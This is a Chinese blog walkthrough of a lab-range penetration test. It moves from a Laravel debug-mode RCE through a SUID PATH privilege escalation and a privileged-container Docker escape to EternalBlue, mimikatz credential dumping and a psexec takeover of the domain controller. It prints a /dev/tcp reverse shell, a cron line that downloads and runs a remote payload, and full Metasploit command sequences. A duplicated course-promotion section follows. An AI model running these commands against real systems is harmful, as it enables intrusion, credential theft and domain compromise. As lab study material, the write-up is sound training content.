一次Docker逃逸引起域控权限的丢失

前言：

内网是一个只有组织工作人员才能访问的专用网络，简而言之就是不可简单地通过外部公网ip进行访问到的公司内部网络。对于一个大型公司的网络系统，通过信息收集找到网站漏洞可以顺利通过公网进入公司内部网络时，进一步对公司内部网络的渗透攻击即为内网渗透。与外网渗透区别是外网渗透更侧重于找漏洞寻找突破口，考验的是渗透测试人员的综合能力，外网渗透的最终还是为了进入内网。而内网渗透更侧重于对目标的熟悉程度，内网相对于外网更为复杂，但是一旦让黑客进入到内网中很可能会造成数据泄露，勒索病毒，监听…事件的产生。此次分享给大家带来一篇由外网打点直到拿到内网域控主机控制权的全过程。

一.环境配置

整个靶场环境一共五个靶机，分别位于三层网络环境中：

网络拓扑如下：

DMZ区IP段为192.168.1.0/24

第二层网络环境IP段为192.168.52.1/24

第三层网络环境IP段为192.168.93.1/24

二. Web打点

首先我们拿到了目标的IP资产信息，为192.168.0.149，那么我们第一步要做的就是进行渗透测试前的信息收集。俗话说的好，信息收集的宽度决定了渗透测试的深度。于是我们直接拿出我们的大宝剑nmap先进行，目标IP的端口探针
Zenmap探针结果如下：

通过ARL灯塔信息收集看看有什么成果。

最终发现目标192.168.0.149开放了22，80，81和6379端口，看到6379首先心里面想到了redis的未授权，想着是否存在未授权呢？

我们首先访问目标IP的81端口。

发现是个Laravel的站点，上百度查询发现官方给出的答案。

Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web
Framework)。它可以让你从面条一样杂乱的代码中解脱出来；它可以帮你构建一个完美的网络APP，而且每行代码都可以简洁、富于表达力。
在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent
ORM。它能方便的将“约束（constraints）”应用到关系的双方，这样你就具有了对数据的完全控制，而且享受到ActiveRecord的所有便利。Eloquent原生支持Fluent中查询构造器（query-
builder）的所有方法。

上网查了下Laravel爆出来的漏洞，发现也有很多，发现了CVE-2021-3129 Laravel Debug mode RCE漏洞
既然时RCE我们是否可以尝试用此漏洞直接拿到目标的webshell呢，具体漏洞分析文章看了下是Laravel自带的Ignition组存在反序列化漏洞，导致攻击者可以构造恶意请求触发Phar反序列化，造成远程代码执行。这里找到了一位师傅的一份exp，一键getshell。

三：提权

成功拿到了目标主机的webshell，通过蚁剑链接webshell。

当打开虚拟终端时候返回的目标系统信息很不寻常，这时判断自己大概率拿下的仅仅是一个docker权限。

通过 cat /proc/self/cgroup 获取容器ID id获取当前用户权限。

现在拿到的docker权限都仅仅是个WWW权限，想要继续渗透必须得提权，那么LINUX提权方式有很多这里我给大家用环境变量提权。

我们查找具有SUID权限的文件。

find / -perm -u=s -type f 2>/dev/null

我们看到了一个shell文件，心想这样的名字肯定不是linux系统自带的，极大可能是运维人员留下来的，所以我们切到对应目录发现有一个demo.c文件猜想其编译完成就是我们的shell文件。

对应的demo是一个ps的命令功能。

我么执行下shell发现正是ps功能。

在demo.c中存在system函数，而system函数继承环境变量，可以通过替换环境变量可以达到执行任意命令。

在 tmp 目录（随便目录都可以）下创建一个ps文件。

cd /tmp
echo “/bin/bash” > ps
chmod 777 ps
echo $PATHexportPATH=/tmp:$PATH # 将/tmp添加到环境变量中，并且先加载执行/tmp里的程序
cd /home/jobs
./shell

但这里通过蚁剑去提权总是失败于是决定经shell反弹给我们的kali主机。

kali收到会话：

再次进行提权环境变量中成功添加了tmp目录。

这里我们成功拿到了目标主机的root权限。

四：docker逃逸：

特权模式于版本0.6时被引入Docker，允许容器内的root拥有外部物理机root权限，而此前容器内root用户仅拥有外部物理机普通用户权限。使用特权模式启动容器，可以获取大量设备文件访问权限。因为当管理员执行docker
run
—privileged时，Docker容器将被允许访问主机上的所有设备，并可以执行mount命令进行挂载。当控制使用特权模式启动的容器时，docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部，获取对整个宿主机的文件读写权限，此外还可以通过写入计划任务等方式在宿主机执行命令。

首先我们现在docker中新建一个/hacker目录用来挂在文件：

mkdir /hack

ls /dev看到/dev目录会发现很多设备文件，

我们可以尝试将 /dev/sda1 挂载到/hack目录里：

mount /dev/sda1 /hacker

挂载完成切换到hacker目录我们做信息收集。

这里我把宿主机的会话反弹到我们的kali主机上，kali监听7777端口。

bash -c ‘exec bash -i &>/dev/tcp/192.168.0.123/7777 <&1’

这里我发现通过shell里面执行ifconfig命令不可以，所以心想着该用我们强大的后渗透工MSF了，输入下面命令。

MSF构建会话

use exploit/multi/script/web_delivery
set target 7
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.0.123
set lport 4444
exploit

echo ‘* * * * * wget -qO TCeAmweH --no-check-certificate
http://192.168.0.123:8080/3gIlS0ed3rbQ3; chmod +x TCeAmweH; ./TCeAmweH&
disown’ >> /hacker/var/spool/cron/crontabs/root

收集ip信息发现。

发现我们的两个网段，但是1网段没有找到，再次查看拓扑图发现我们现在应该是直接到了第二台ubutun，那么为什么没有经过第一个直接到第二个呢，原来是目标网站是做了反向代理了，也就是说此时拿下的才是真正的Web服务器，前面那个仅仅是一台代理机。

---

我们吹响进攻内网域控的号角，前面发现了另一个网段93，于是我们添加路由。

run post/multi/manage/autoroute
run autoroute -p

之后添加代理：

use auxiliary/server/socks_proxy
set SRVHOST 192.168.0.123
set SRVPORT 5566
exploit

将nmap添加到sockscap中探针内网网段。

探针到我们52网段下抛去网关和广播地址不看有三台主机分别两台linux和一台windows主机。

我们现在拿到的权限是192.168.52.20，看到192.168.52.10端口开放情况推断出应该是之前提到过的代理机所以我们把目标放在192.168.52.30。

探针192.168.52.30的端口情况开放了88端口对应的是一个web页面。

是个通达OA，经测试其版本为通达OA
V11.3，该版本存在任意用户登录、文件包含和文件上传等多个漏洞所以我们有这样一个想发生成一个exe木马然后msf上传到现在的肉鸡，win7远程从肉鸡开启的http服务上将shell.exe下载下来执行。

但是这里我并没有选择这样去做因为我发现探测他的93网段发现了两台新主机93.30和93.40，而且有一台是windows7参考靶场文档有永恒之蓝漏洞，所以心想试试万一成功了就可以直接跳到下一网段，省去好多事，岂不美滋滋。

93.40是windows主机我们这里想是否存在永恒之蓝漏洞所以我们用msf尝试。

use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.93.40
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.40
set lport 4444
exploit

接着，我们使用meterpreter上的kiwi模块尝试抓取域用户及域管理员的密码：

load kiwi
kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

我们现在的攻击路径：

发起总攻向域控。

先关闭其防火墙

net use \192.168.93.30\ipc$ “Whoami2021” /user:“Administrator”
sc \192.168.93.30 create unablefirewall binpath= “netsh advfirewall set
allprofiles state off”
sc \192.168.93.30 start unablefirewall

然后使用SMB协议横向拓展到域控主机

use exploit/windows/smb/psexec
set payload windows/meterpreter/bind_tcp
set rhost 192.168.93.30
set smbuser administrator
set smbpass Whoami2021
exploit

顺利拿下整个靶场，总体来说这套红日的靶场难度还是有的，从web打点—>docker提权---->docker逃逸---->信息收集----->永恒之蓝----->SMB横向拓展----->域控权限。打完之后收获很多，尤其对docker上的渗透测试有了新的认识，但并没有将靶场内的所有点都进行测试一遍，只是选了一条我认为最佳最有效的进攻路线，当拿到了域控权限可以dump整个hash也是一种变向拿到了所有主机的权限。文笔粗浅文中如有表达有误的地方，恳请各位师傅指教。

)]

顺利拿下整个靶场，总体来说这套红日的靶场难度还是有的，从web打点—>docker提权---->docker逃逸---->信息收集----->永恒之蓝----->SMB横向拓展----->域控权限。打完之后收获很多，尤其对docker上的渗透测试有了新的认识，但并没有将靶场内的所有点都进行测试一遍，只是选了一条我认为最佳最有效的进攻路线，当拿到了域控权限可以dump整个hash也是一种变向拿到了所有主机的权限。文笔粗浅文中如有表达有误的地方，恳请各位师傅指教。

题外话

初入计算机行业的人或者大学计算机相关专业毕业生，很多因缺少实战经验，就业处处碰壁。下面我们来看两组数据：

2023届全国高校毕业生预计达到1158万人，就业形势严峻；

国家网络安全宣传周公布的数据显示，到2027年我国网络安全人员缺口将达327万。

一方面是每年应届毕业生就业形势严峻，一方面是网络安全人才百万缺口。

6月9日，麦可思研究2023年版就业蓝皮书（包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》）正式发布。

2022届大学毕业生月收入较高的前10个专业

本科计算机类、高职自动化类专业月收入较高。2022届本科计算机类、高职自动化类专业月收入分别为6863元、5339元。其中，本科计算机类专业起薪与2021届基本持平，高职自动化类月收入增长明显，2022届反超铁道运输类专业（5295元）排在第一位。

具体看专业，2022届本科月收入较高的专业是信息安全（7579元）。对比2018届，电子科学与技术、自动化等与人工智能相关的本科专业表现不俗，较五年前起薪涨幅均达到了19%。数据科学与大数据技术虽是近年新增专业但表现亮眼，已跻身2022届本科毕业生毕业半年后月收入较高专业前三。五年前唯一进入本科高薪榜前10的人文社科类专业——法语已退出前10之列。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CF7tNtAb-1693067243644)(C:\Users\Administrator\AppData\Roaming\Typora\typora-user-images\image-20230809162658551.png)]

“没有网络安全就没有国家安全”。当前，网络安全已被提升到国家战略的高度，成为影响国家安全、社会稳定至关重要的因素之一。

网络安全行业特点

1、就业薪资非常高，涨薪快 2021年猎聘网发布网络安全行业就业薪资行业最高人均33.77万！

2、人才缺口大，就业机会多

2019年9月18日《中华人民共和国中央人民政府》官方网站发表：我国网络空间安全人才 需求140万人，而全国各大学校每年培养的人员不到1.5W人。猎聘网《2021年上半年网络安全报告》预测2027年网安人才需求300W，现在从事网络安全行业的从业人员只有10W人。

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

行业发展空间大，岗位非常多

网络安全行业产业以来，随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…

职业增值潜力大

网络安全专业具有很强的技术特性，尤其是掌握工作中的核心网络架构、安全技术，在职业发展上具有不可替代的竞争优势。

随着个人能力的不断提升，所从事工作的职业价值也会随着自身经验的丰富以及项目运作的成熟，升值空间一路看涨，这也是为什么受大家欢迎的主要原因。

从某种程度来讲，在网络安全领域，跟医生职业一样，越老越吃香，因为技术愈加成熟，自然工作会受到重视，升职加薪则是水到渠成之事。

黑客&网络安全如何学习

今天只要你给我的文章点赞，我私藏的网安学习资料一样免费共享给你们，来看看有哪些东西。

1.学习路线图

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EsQdHkvH-1693067243644)(C:\Users\Administrator\Desktop\网安思维导图\享学首创年薪40W+网络安全工程师 青铜到王者技术成长路线V4.0.png)]

攻击和防守要学的东西也不少，具体要学的东西我都写在了上面的路线图，如果你能学完它们，你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，上面路线图的每一个知识点，我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等，都是网络安全入门必知必会的学习内容。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Qhwl7Ta-1693067243645)(C:\Users\Administrator\Desktop\网安资料截图\视频课件.jpeg)]

（都打包成一块的了，不能一一展开，总共300多集）

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

3.技术文档和电子书

技术文档也是我自己整理的，包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点，电子书也有200多本，由于内容的敏感性，我就不一一展示了。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等，感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包，需要的话也可以拿走。

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取
如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！

最后就是我这几年整理的网安方面的面试题，如果你是要找网安方面的工作，它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的，如果大家有好的题目或者好的见解欢迎分享。

参考解析：深信服官网、奇安信官网、Freebuf、csdn等

内容特点：条理清晰，含图像化表示更加易懂。

内容概要：包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限，仅展示部分资料，需要点击下方链接即可前往获取

如果你对网络安全入门感兴趣，那么你需要的话可以点击这里👉网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！